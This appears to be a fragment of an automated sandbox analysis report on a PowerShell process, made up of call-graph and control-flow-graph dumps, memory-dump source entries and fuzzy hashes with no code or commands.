8286569 148599->148602 148601 8286527 148600->148601 148600->148602 148622 8284a20 148600->148622 148629 8284a10 148600->148629 148601->148602 148636 82b8fe8 148601->148636 148641 82b90f5 148601->148641 148602->148508 148609 82b6768 148607->148609 148608 82b69f7 148608->148507 148609->148608 148678 82b6221 148609->148678 148683 82b6230 148609->148683 148613 82b69f7 148612->148613 148614 82b6793 148612->148614 148613->148507 148614->148613 148615 82b6221 2 API calls 148614->148615 148616 82b6230 2 API calls 148614->148616 148615->148614 148616->148614 148618 82b679d 148617->148618 148619 82b69f7 148618->148619 148620 82b6221 2 API calls 148618->148620 148621 82b6230 2 API calls 148618->148621 148619->148507 148620->148618 148621->148618 148623 8284a54 148622->148623 148624 8284a69 148623->148624 148646 8282cb0 148623->148646 148651 828fb37 148623->148651 148657 828fb48 148623->148657 148663 8282cc0 148623->148663 148624->148624 148630 8284a54 148629->148630 148631 828fb48 2 API calls 148630->148631 148632 8284a69 148630->148632 148633 8282cb0 2 API calls 148630->148633 148634 8282cc0 2 API calls 148630->148634 148635 828fb37 2 API calls 148630->148635 148631->148632 148633->148632 148634->148632 148635->148632 148638 82b9010 148636->148638 148637 82b9110 148637->148601 148668 82b8d88 148638->148668 148673 82b8d78 148638->148673 148642 82b90fd 148641->148642 148644 82b8d78 2 API calls 148642->148644 148645 82b8d88 2 API calls 148642->148645 148643 82b9110 148643->148601 148644->148643 148645->148643 148648 8282cb7 148646->148648 148647 8282df4 148647->148647 148649 82b3638 GetFileAttributesW SetThreadUILanguage 148648->148649 148650 82b3624 GetFileAttributesW SetThreadUILanguage 148648->148650 148649->148647 148650->148647 148652 828fb61 148651->148652 148653 828fb7d 148651->148653 148652->148653 148654 828f848 GetFileAttributesW SetThreadUILanguage 148652->148654 148655 828f6c0 GetFileAttributesW SetThreadUILanguage 148652->148655 148656 828f611 GetFileAttributesW 
SetThreadUILanguage 148652->148656 148653->148624 148654->148652 148655->148652 148656->148652 148658 828fb61 148657->148658 148659 828fb7d 148657->148659 148658->148659 148660 828f848 GetFileAttributesW SetThreadUILanguage 148658->148660 148661 828f6c0 GetFileAttributesW SetThreadUILanguage 148658->148661 148662 828f611 GetFileAttributesW SetThreadUILanguage 148658->148662 148659->148624 148660->148658 148661->148658 148662->148658 148665 8282cd1 148663->148665 148664 8282df4 148664->148664 148666 82b3638 GetFileAttributesW SetThreadUILanguage 148665->148666 148667 82b3624 GetFileAttributesW SetThreadUILanguage 148665->148667 148666->148664 148667->148664 148669 82b8db1 148668->148669 148670 82b8f03 148668->148670 148671 82b868f GetFileAttributesW SetThreadUILanguage 148669->148671 148672 82b86a0 GetFileAttributesW SetThreadUILanguage 148669->148672 148670->148637 148671->148670 148672->148670 148674 82b8f03 148673->148674 148675 82b8db1 148673->148675 148674->148637 148676 82b868f GetFileAttributesW SetThreadUILanguage 148675->148676 148677 82b86a0 GetFileAttributesW SetThreadUILanguage 148675->148677 148676->148674 148677->148674 148679 82b6267 148678->148679 148688 82b5b38 148679->148688 148692 82b5b28 148679->148692 148680 82b62ed 148684 82b6267 148683->148684 148686 82b5b28 2 API calls 148684->148686 148687 82b5b38 2 API calls 148684->148687 148685 82b62ed 148686->148685 148687->148685 148689 82b5b4d 148688->148689 148690 82b5e63 148689->148690 148691 82b578b GetFileAttributesW SetThreadUILanguage 148689->148691 148690->148680 148691->148690 148693 82b5b38 148692->148693 148694 82b5e63 148693->148694 148695 82b578b GetFileAttributesW SetThreadUILanguage 148693->148695 148694->148680 148695->148694 148696 8135d58 148697 8135cfc 148696->148697 148698 8135d09 148697->148698 148699 815dd84 2 API calls 148697->148699 148699->148698 148700 8137bd8 148701 8137c06 148700->148701 148702 8137be4 148700->148702 148702->148701 148703 8138350 2 API calls 148702->148703 
148704 8138340 2 API calls 148702->148704 148705 8137c10 2 API calls 148702->148705 148706 8137c20 2 API calls 148702->148706 148707 813834e 2 API calls 148702->148707 148703->148702 148704->148702 148705->148702 148706->148702 148707->148702 148760 833d118 148762 833d130 148760->148762 148761 833d134 148762->148761 148765 8338330 148762->148765 148764 833d21c 148766 8338357 148765->148766 148767 833835b 148766->148767 148770 8341830 148766->148770 148776 8341820 148766->148776 148767->148764 148771 8341846 148770->148771 148773 8341885 148770->148773 148782 81579f0 148771->148782 148791 81579e0 148771->148791 148772 834187d 148772->148767 148773->148767 148777 8341846 148776->148777 148779 8341885 148776->148779 148780 81579f0 GetFileAttributesW 148777->148780 148781 81579e0 GetFileAttributesW 148777->148781 148778 834187d 148778->148767 148779->148767 148780->148778 148781->148778 148783 8157a19 148782->148783 148784 8157a8c 148782->148784 148783->148784 148785 8157a84 148783->148785 148786 81579f0 GetFileAttributesW 148783->148786 148787 81579e0 GetFileAttributesW 148783->148787 148784->148772 148785->148784 148800 810d670 148785->148800 148805 810d78c 148785->148805 148810 810d680 148785->148810 148786->148785 148787->148785 148792 8157a19 148791->148792 148794 8157a8c 148791->148794 148793 8157a84 148792->148793 148792->148794 148795 81579f0 GetFileAttributesW 148792->148795 148796 81579e0 GetFileAttributesW 148792->148796 148793->148794 148797 810d670 GetFileAttributesW 148793->148797 148798 810d680 GetFileAttributesW 148793->148798 148799 810d78c GetFileAttributesW 148793->148799 148794->148772 148795->148793 148796->148793 148797->148794 148798->148794 148799->148794 148801 810d6af 148800->148801 148802 810d76e 148800->148802 148801->148802 148815 81520d8 148801->148815 148819 81520c8 148801->148819 148802->148784 148806 810d76e 148805->148806 148807 810d747 148805->148807 148807->148806 148808 81520d8 GetFileAttributesW 148807->148808 148809 81520c8 
GetFileAttributesW 148807->148809 148808->148806 148809->148806 148811 810d6af 148810->148811 148812 810d76e 148810->148812 148811->148812 148813 81520d8 GetFileAttributesW 148811->148813 148814 81520c8 GetFileAttributesW 148811->148814 148812->148784 148813->148812 148814->148812 148817 81520e6 148815->148817 148816 81520f2 148816->148802 148817->148816 148823 815a956 148817->148823 148820 81520d8 148819->148820 148821 81520f2 148820->148821 148822 815a956 GetFileAttributesW 148820->148822 148821->148802 148822->148821 148824 815a95f 148823->148824 148825 815aa21 148824->148825 148828 815b670 148824->148828 148834 815b65c 148824->148834 148829 815b681 148828->148829 148830 815b730 148829->148830 148840 815b7e9 148829->148840 148845 815b7f8 148829->148845 148830->148825 148831 815b7c5 148831->148825 148836 815b670 148834->148836 148835 815b730 148835->148825 148836->148835 148838 815b7e9 GetFileAttributesW 148836->148838 148839 815b7f8 GetFileAttributesW 148836->148839 148837 815b7c5 148837->148825 148838->148837 148839->148837 148841 815b7f8 148840->148841 148849 815b838 148841->148849 148855 815b848 148841->148855 148842 815b816 148842->148831 148847 815b838 GetFileAttributesW 148845->148847 148848 815b848 GetFileAttributesW 148845->148848 148846 815b816 148846->148831 148847->148846 148848->148846 148850 815b848 148849->148850 148851 815bb24 148850->148851 148853 29d4a98 GetFileAttributesW 148850->148853 148854 29d4af8 GetFileAttributesW 148850->148854 148852 815b8b7 148852->148842 148853->148852 148854->148852 148856 815b873 148855->148856 148857 815bb24 148856->148857 148859 29d4a98 GetFileAttributesW 148856->148859 148860 29d4af8 GetFileAttributesW 148856->148860 148858 815b8b7 148858->148842 148859->148858 148860->148858 148861 8154279 148862 8154281 148861->148862 148865 8151798 148862->148865 148867 81517c9 148865->148867 148866 8151947 148867->148866 148872 810e9b5 148867->148872 148877 810e701 148867->148877 148886 810e8a0 148867->148886 148891 810ec49 
148867->148891 148873 810e9bd 148872->148873 148896 815acb9 148873->148896 148901 815acc8 148873->148901 148874 810ea32 148878 810e71c 148877->148878 148883 810d670 GetFileAttributesW 148878->148883 148884 810d680 GetFileAttributesW 148878->148884 148885 810d78c GetFileAttributesW 148878->148885 148879 810e89b 148880 810e967 148879->148880 148881 815acb9 GetFileAttributesW 148879->148881 148882 815acc8 GetFileAttributesW 148879->148882 148880->148866 148881->148880 148882->148880 148883->148879 148884->148879 148885->148879 148888 810e8a5 148886->148888 148887 810e967 148887->148866 148888->148887 148889 815acb9 GetFileAttributesW 148888->148889 148890 815acc8 GetFileAttributesW 148888->148890 148889->148887 148890->148887 148892 810e907 148891->148892 148893 810e967 148892->148893 148894 815acb9 GetFileAttributesW 148892->148894 148895 815acc8 GetFileAttributesW 148892->148895 148893->148866 148894->148893 148895->148893 148897 815ad4c 148896->148897 148898 815aced 148896->148898 148897->148874 148898->148897 148906 8159b77 148898->148906 148917 8159b88 148898->148917 148902 815aced 148901->148902 148903 815ad4c 148901->148903 148902->148903 148904 8159b77 GetFileAttributesW 148902->148904 148905 8159b88 GetFileAttributesW 148902->148905 148903->148874 148904->148903 148905->148903 148907 8159b2c 148906->148907 148908 8159b82 148906->148908 148907->148897 148909 8159bdf 148908->148909 148910 8159fc0 148908->148910 148927 8159418 148909->148927 148932 8159420 148909->148932 148911 815a045 148910->148911 148915 8159b77 GetFileAttributesW 148910->148915 148916 8159b88 GetFileAttributesW 148910->148916 148911->148897 148912 8159c3b 148912->148897 148915->148911 148916->148911 148918 8159bae 148917->148918 148919 8159fc0 148918->148919 148920 8159bdf 148918->148920 148921 815a045 148919->148921 148925 8159b77 GetFileAttributesW 148919->148925 148926 8159b88 GetFileAttributesW 148919->148926 148923 8159420 GetFileAttributesW 148920->148923 148924 8159418 
GetFileAttributesW 148920->148924 148921->148897 148922 8159c3b 148922->148897 148923->148922 148924->148922 148925->148921 148926->148921 148928 815943b 148927->148928 148929 815949f 148928->148929 148937 81584c0 148928->148937 148944 81585c0 148928->148944 148929->148912 148933 815943b 148932->148933 148934 815949f 148933->148934 148935 81584c0 GetFileAttributesW 148933->148935 148936 81585c0 GetFileAttributesW 148933->148936 148934->148912 148935->148934 148936->148934 148938 81584f2 148937->148938 148939 8158507 148938->148939 148940 8158400 GetFileAttributesW 148938->148940 148941 29d4a98 GetFileAttributesW 148938->148941 148942 81583fc GetFileAttributesW 148938->148942 148951 8158448 148938->148951 148939->148929 148940->148938 148941->148938 148942->148938 148945 81585dd 148944->148945 148946 8158738 148945->148946 148947 8158400 GetFileAttributesW 148945->148947 148948 29d4a98 GetFileAttributesW 148945->148948 148949 81583fc GetFileAttributesW 148945->148949 148950 8158448 GetFileAttributesW 148945->148950 148946->148929 148947->148945 148948->148945 148949->148945 148950->148945 148952 815846c 148951->148952 148953 8158400 GetFileAttributesW 148951->148953 148954 81583fc GetFileAttributesW 148951->148954 148952->148938 148953->148952 148954->148952 148708 29d8f10 148709 29d8f25 148708->148709 148711 29dc7b8 IdentifyCodeAuthzLevelW 148709->148711 148712 29dc7c8 IdentifyCodeAuthzLevelW 148709->148712 148710 29da28c 148711->148710 148712->148710 148999 29ddd60 149000 29ddda6 GetSystemInfo 148999->149000 149001 29dddd6 149000->149001

Control-flow Graph

control_flow_graph 0 833e6d0-833e74b 7 833e74e-833e75c 0->7 9 833e76a-833e773 7->9 10 833e75e-833e768 7->10 11 833e83a-833e84d 9->11 12 833e779-833e7a9 9->12 10->9 18 833e8f3-833e8f5 11->18 19 833e853-833e877 11->19 26 833e7c1-833e835 12->26 27 833e7ab-833e7b1 12->27 22 833e8fd-833e90b 18->22 37 833e879-833e87f 19->37 38 833e88f-833e8e0 19->38 28 833e919-833e922 22->28 29 833e90d-833e917 22->29 84 833ec95-833ec9c 26->84 30 833e7b3 27->30 31 833e7b5-833e7b7 27->31 32 833e9f8-833e9ff 28->32 33 833e928-833e93f 28->33 29->28 30->26 31->26 152 833ea01 call 833a3b0 32->152 153 833ea01 call 833a3a8 32->153 51 833e9c2-833e9f3 33->51 52 833e945-833e964 33->52 40 833e883-833e885 37->40 41 833e881 37->41 85 833e8e6-833e8f1 38->85 86 833ec9d-833ecb4 38->86 40->38 41->38 47 833ea07-833ea0c 49 833ea12-833ea31 47->49 50 833eac1-833eb05 47->50 65 833ea33-833ea39 49->65 66 833ea49-833eabc 49->66 96 833eb13-833eb17 50->96 97 833eb07-833eb11 50->97 51->84 68 833e966-833e96c 52->68 69 833e97c-833e9ba 52->69 70 833ea3b 65->70 71 833ea3d-833ea3f 65->71 66->84 72 833e970-833e972 68->72 73 833e96e 68->73 69->51 70->66 71->66 72->69 73->69 85->22 102 833ecbb-833ecea 86->102 100 833eb21-833eb2b 96->100 101 833eb19 96->101 97->96 104 833eb37-833eb3e 100->104 105 833eb2d-833eb32 100->105 101->100 114 833ecf0-833ed64 102->114 115 833ed6c-833ed70 102->115 107 833eb44-833eb5d 104->107 108 833ec1e-833ec22 104->108 105->7 107->108 124 833eb63-833eb88 107->124 111 833ec61-833ec64 108->111 112 833ec24-833ec2e 108->112 113 833ec67-833ec93 111->113 117 833ec30-833ec35 112->117 118 833ec3d-833ec46 112->118 113->84 114->115 117->118 118->102 119 833ec48-833ec5f 118->119 119->113 136 833eba0-833ec1c 124->136 137 833eb8a-833eb90 124->137 136->84 139 833eb92 137->139 140 833eb94-833eb96 137->140 139->136 140->136 152->47 153->47
Strings
Memory Dump Source
• Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
Similarity
• API ID:
• String ID: ^Et$^Et$^Et$^Et$^Et$k
• API String ID: 0-1005809038
• Opcode ID: 4f071e954396f1e2cb5063fe11c95fa3deb578ff3af95e88017adab466604539
• Instruction ID: 4436551305445528cd25ac3db5c2229da9d9a9716c29bc1f0a60bb67ffa2678c
• Opcode Fuzzy Hash: 4f071e954396f1e2cb5063fe11c95fa3deb578ff3af95e88017adab466604539
• Instruction Fuzzy Hash: 8E127A34B006149FDB19EBA9C854AAEBBA6FFC8301B15852DD406EB350DF35ED06CB91

Control-flow Graph

control_flow_graph 530 8205990-82059c2 532 82059c4-82059f3 530->532 533 82059f6-8205a00 530->533 534 8205d26-8205d44 533->534 535 8205a06-8205bb5 533->535 537 8205e39-8205e66 534->537 538 8205d4a-8205e32 534->538 659 8205c45-8205d21 535->659 660 8205bbb-8205bcf 535->660 547 8205f25-8205f76 537->547 548 8205e6c-8205f20 537->548 538->537 569 8206010-82060ca 547->569 570 8205f7c-8205f98 547->570 612 820628f-8206299 548->612 662 8206137-8206268 569->662 663 82060cc-82060d5 569->663 584 820641e-8206428 570->584 585 8205f9e-820600a 570->585 593 8206440-8206445 584->593 594 820642a-820643f 584->594 585->569 585->570 598 8206447-8206449 call 82051e0 593->598 599 820644e-8206454 593->599 594->593 598->599 602 8206464-8206466 599->602 603 8206456-820645a 599->603 605 8206468-8206479 602->605 606 820647b 602->606 603->602 609 820645c 603->609 610 820647d-8206485 605->610 606->610 728 820645e call 8332e77 609->728 729 820645e call 8332e48 609->729 730 820645e call 8332e88 609->730 615 8206497-8206499 610->615 616 8206487-820648b 610->616 617 8206405-8206409 612->617 618 820629f-82062f2 612->618 624 82064a9-82064ae 615->624 625 820649b-820649f 615->625 616->615 622 820648d 616->622 620 8206414-820641b 617->620 621 820640b-8206411 617->621 649 8206321-82063fe 618->649 650 82062f4-820631a 618->650 621->620 724 820648f call 82064c0 622->724 725 820648f call 82064b4 622->725 625->624 628 82064a1 625->628 628->624 630 8206495 630->624 649->617 650->649 659->537 669 8205bd1-8205bdd 660->669 670 8205bdf-8205beb 660->670 662->584 722 820626e-8206287 662->722 663->584 665 82060db-820611d 663->665 726 8206123 call 8204d40 665->726 727 8206123 call 8204d2f 665->727 674 8205bf7-8205c3f 669->674 670->674 674->659 674->660 701 8206129-8206135 701->662 701->663 722->612 724->630 725->630 726->701 727->701 728->602 729->602 730->602
Strings
Memory Dump Source
• Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
Similarity
• API ID:
• String ID: "Et$"Et$fBKt
• API String ID: 0-2422460936
• Opcode ID: b951d043cc3aab8914fe39b86a278e079a88e53a27d6fc52a22d020177bc34f5
• Instruction ID: dcf8c8dccd3290436f303cc886a985b3759263bf8aef7772d918f7ee0515b903
• Opcode Fuzzy Hash: b951d043cc3aab8914fe39b86a278e079a88e53a27d6fc52a22d020177bc34f5
• Instruction Fuzzy Hash: 22620574B002158FDB64DF68C854BAEB7B6BF88301F1085A9D40AEB395DB359E82CF51
Strings
Memory Dump Source
• Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
Similarity
• API ID:
• String ID: |@Et
• API String ID: 0-2857452445
• Opcode ID: dd1aa7f9a3f0c8fe5ff060fddea75a94145324dfd347b127b56ad2ce9c9a3597
• Instruction ID: 13fdb702944f473264c04c868c0a237d42261be64ea8a0eb36fee739bf939815
• Opcode Fuzzy Hash: dd1aa7f9a3f0c8fe5ff060fddea75a94145324dfd347b127b56ad2ce9c9a3597
• Instruction Fuzzy Hash: CAE16834A00315CFDB55DF64C884AAEBBF6FF98301F10856DE406AB265DB34E946CBA1
APIs
Memory Dump Source
• Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: 0f13e925ec3f022d2b853d1de657923265922f31e41c41f33a8da8093ca6b7b2
• Instruction ID: bf9c7bc028fd876e2c354f523b2b9df0dfc81092ce77cdb1bf536a81dfb032e9
• Opcode Fuzzy Hash: 0f13e925ec3f022d2b853d1de657923265922f31e41c41f33a8da8093ca6b7b2
• Instruction Fuzzy Hash: B8111DB1C002499BCB00CF9AD544B9EFBF8FF49224F10812AD818A3200C3B8AA00CFA1
Memory Dump Source
• Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8c76206374f24b191919068a012aeb987c16b9aeab52574aa91816927fb8ca8
                                                                                                  • Instruction ID: 9437fef52ba47028170e20ac3810497c2449b603e3f455c281c70411764e9152
                                                                                                  • Opcode Fuzzy Hash: d8c76206374f24b191919068a012aeb987c16b9aeab52574aa91816927fb8ca8
                                                                                                  • Instruction Fuzzy Hash: FD82F574A00218DFDB15DF64C984B99BBF2BF88311F1485A9E909AB361CB75ED82CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c0adff11d5f2205494cdd646f49072a549fff86182d1b524f5ed9d369f219d4
                                                                                                  • Instruction ID: d018488af847e338ab117331193d87bda8f9a94ec9cb64c28bb01ce8f5669a10
                                                                                                  • Opcode Fuzzy Hash: 2c0adff11d5f2205494cdd646f49072a549fff86182d1b524f5ed9d369f219d4
                                                                                                  • Instruction Fuzzy Hash: 8D527C34A00219DFDF14DF64C844BAEBBB6BF89300F1481A9E949AB260DB75ED85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1febb2e5de49a7206c7f32b05103f5a4b6ca9aea5a9942e31bbe589d2166bed7
                                                                                                  • Instruction ID: 4011bf01c91853c9daa0d4cc2b63938949a1b7ed757080c032405d77412956bd
                                                                                                  • Opcode Fuzzy Hash: 1febb2e5de49a7206c7f32b05103f5a4b6ca9aea5a9942e31bbe589d2166bed7
                                                                                                  • Instruction Fuzzy Hash: FC526F70A00605DFDB19DF64D894A9EBBB2FF88301F148929E8169B3A0DB75ED41CF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b7038076e040a61c7b9b231494bfaa76a80af14892216395dcc98033ce258b92
                                                                                                  • Instruction ID: f842acd6313277585295f0b2fe026355733d14b30dc328289f582b269067047f
                                                                                                  • Opcode Fuzzy Hash: b7038076e040a61c7b9b231494bfaa76a80af14892216395dcc98033ce258b92
                                                                                                  • Instruction Fuzzy Hash: 2C524B34A00225CFDB24EF64D8547ADB7B2FF88311F1485A9D80AAB351DB759E86CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cbdd7601b3ba67dcd9325715c4553888a086d66cd48d1c31eaf18e807c62031b
                                                                                                  • Instruction ID: daa70ff6f89bfa69c06a6d087cdd086c2180460b0ad11675c43a188981148688
                                                                                                  • Opcode Fuzzy Hash: cbdd7601b3ba67dcd9325715c4553888a086d66cd48d1c31eaf18e807c62031b
                                                                                                  • Instruction Fuzzy Hash: E4424B74A00205CFDB05DF65D484AAE7BF6BF88321F159569E806AB3A1DB74EC42CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4704b26cd39200b2ada27a2b6580c1855fc46ff4f5059fb19627774f2431e1ee
                                                                                                  • Instruction ID: f02b55d67742a9f48c9f9e925a7296642fcd8108b6b8c08327465f329467e547
                                                                                                  • Opcode Fuzzy Hash: 4704b26cd39200b2ada27a2b6580c1855fc46ff4f5059fb19627774f2431e1ee
                                                                                                  • Instruction Fuzzy Hash: 82024A75B006099FDB14DFA9C894A9EB7B6FF88310F188528E806DB354DB34ED46CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1ff8dfe6e23d65f5df7fe7802151104bd0bf9ab584e5c1cfc8990555d0ab2fc3
                                                                                                  • Instruction ID: e552b5b21880770e6c55ac0089dcdbb750b77bbe28f5911d75ce45fe9943e2ec
                                                                                                  • Opcode Fuzzy Hash: 1ff8dfe6e23d65f5df7fe7802151104bd0bf9ab584e5c1cfc8990555d0ab2fc3
                                                                                                  • Instruction Fuzzy Hash: CD026B70A00209DFDB44EFA8D884BAEB7B2FF88311F148669D5059B391DB74ED45CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 83a9f97e963c1a5d8ef829a4bdc73b33345713cc77f896f79b285f5a7073515f
                                                                                                  • Instruction ID: 46507bbdb20880d1fba7b86a1634e3063b97182153a964897b5b25c6c4028a51
                                                                                                  • Opcode Fuzzy Hash: 83a9f97e963c1a5d8ef829a4bdc73b33345713cc77f896f79b285f5a7073515f
                                                                                                  • Instruction Fuzzy Hash: 64D19DB0E00248AFDB18DFA5D851BEEBBB2FF89300F548069E501AB391CB75AD45CB55

                                                                                                   Control-flow Graph (text export of the rendered graph; the executed/not-executed block coloring is not preserved in text. Tokens: "<id> <start>-<end>" or "<id> <addr>" is a basic block, "<id> <addr> call <target>" a call site, "<a>-><b>" an edge. Entry block 820fa00, exit block 820fb2a-820fb2e, no call sites):
                                                                                                  control_flow_graph 154 820fa00-820fa1a 156 820fa69-820fa77 154->156 157 820fa1c-820fa2a 154->157 162 820fad5-820fae3 156->162 163 820fa79-820fa87 156->163 160 820fa2c-820fa38 157->160 161 820fa3d-820fa44 157->161 170 820fb2a-820fb2e 160->170 164 820fa4a-820fa4c 161->164 171 820fae5-820faf0 162->171 172 820fb1a-820fb22 162->172 173 820fa89-820fa8f 163->173 174 820fa9f-820fab0 163->174 168 820fa64 164->168 169 820fa4e-820fa54 164->169 168->170 175 820fa56 169->175 176 820fa58-820fa5a 169->176 171->172 183 820faf2-820fb00 171->183 172->170 177 820fa91 173->177 178 820fa93-820fa95 173->178 181 820fad1-820fad3 174->181 182 820fab2-820facf 174->182 175->168 176->168 177->174 178->174 181->170 182->181 186 820fb02-820fb08 183->186 187 820fb18 183->187 188 820fb0a 186->188 189 820fb0c-820fb0e 186->189 187->170 188->187 189->187
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ld>t$Ld>t$Ld>t$Ld>t$Ld>t$Ld>t
                                                                                                  • API String ID: 0-64380967
                                                                                                  • Opcode ID: d65d6192dfb27965fc34274d74286c6518f02c038071790b32d14ede0c712f43
                                                                                                  • Instruction ID: 92bd0567c80d33875ad8dcb8ca7f821b62e86fc515d80a61e784f87344b293a3
                                                                                                  • Opcode Fuzzy Hash: d65d6192dfb27965fc34274d74286c6518f02c038071790b32d14ede0c712f43
                                                                                                  • Instruction Fuzzy Hash: CF318734364211DFD7249F2DD654A2637EAEFCC2527298069E806CB3E5DE71DC018F22

                                                                                                   Control-flow Graph (text export; entry block 8206f38, exit block 82072c7-8207303; call site 8207025 is exported with two targets, 8205990 and 8205971):
                                                                                                  control_flow_graph 191 8206f38-8206fc9 203 8206fd7-8206ff8 191->203 204 8206fcb-8206fce 191->204 207 8207019-8207022 203->207 208 8206ffa-8207012 203->208 204->203 263 8207025 call 8205990 207->263 264 8207025 call 8205971 207->264 208->207 210 820702b-8207073 217 8207079-820707d 210->217 218 820720f-82072c5 210->218 219 820708f-82070ad 217->219 220 820707f-820708d 217->220 252 82072c7-8207303 218->252 224 82070f2-82070fe 219->224 225 82070af-82070c6 219->225 220->219 227 8207104-820720a 220->227 224->218 224->227 232 82070c8 225->232 233 82070cf-82070f0 225->233 227->252 232->233 233->224 263->210 264->210
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$^Et$^Et$^Et
                                                                                                  • API String ID: 0-783043182
                                                                                                  • Opcode ID: aa4a9074c61b5bfa5b84fb384e21fdf2ac16436e57d92fd10af062d24db4251f
                                                                                                  • Instruction ID: dd3ef4b145652ca4cf4857b496527e6f24d76ba38a4e12704a113770520575d2
                                                                                                  • Opcode Fuzzy Hash: aa4a9074c61b5bfa5b84fb384e21fdf2ac16436e57d92fd10af062d24db4251f
                                                                                                  • Instruction Fuzzy Hash: 95B15D34B006059FEB14DB68D854BAFB7A6FFC8300F148529E50AAB395DF75ED028B91

                                                                                                   Control-flow Graph (text export; entry block 820f6c8; call site 820f7d8 is exported with two targets, 820f9f0 and 820fa00 (the first function above), and call site 820f851 targets 8207488):
